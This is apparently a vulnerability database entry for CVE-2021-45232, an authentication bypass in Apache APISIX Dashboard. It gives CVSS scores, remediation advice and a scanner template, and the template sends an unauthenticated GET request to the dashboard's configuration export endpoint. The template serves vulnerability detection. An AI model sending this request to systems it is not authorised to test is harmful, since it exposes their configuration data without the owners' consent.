CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
99.8%
In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework droplet
on the basis of framework gin.' While all APIs and authentication middleware are developed based on framework
droplet, some API directly use the interface of framework
gin` thus bypassing their authentication.
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
impact: |
An attacker can gain unauthorized access to the API, potentially leading to data breaches or unauthorized actions.
remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
reference:
- https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
- https://github.com/pingpongcult/CVE-2021-45232
- https://github.com/advisories/GHSA-wcxq-f256-53xp
- https://twitter.com/403Timeout/status/1475715079173976066
- https://github.com/wuppp/cve-2021-45232-exp
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-45232
cwe-id: CWE-306
epss-score: 0.97214
epss-percentile: 0.9983
cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: apisix_dashboard
tags: cve2021,cve,apache,unauth,apisix
http:
- method: GET
path:
- "{{RootURL}}/apisix/admin/migrate/export"
matchers-condition: and
matchers:
- type: word
words:
- '"Consumers":'
- type: status
status:
- 200
# digest: 490a00463044022027a897964026aebab54d105b9661c1c5ec7ff9f3cd89da2b6203bedbb09a0b2802205a20c9ceeac1c9b798e70174052c0a43c78b9691420a248137026b44288c2efe:922c64590222798bb761d5b6d8e72950
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
99.8%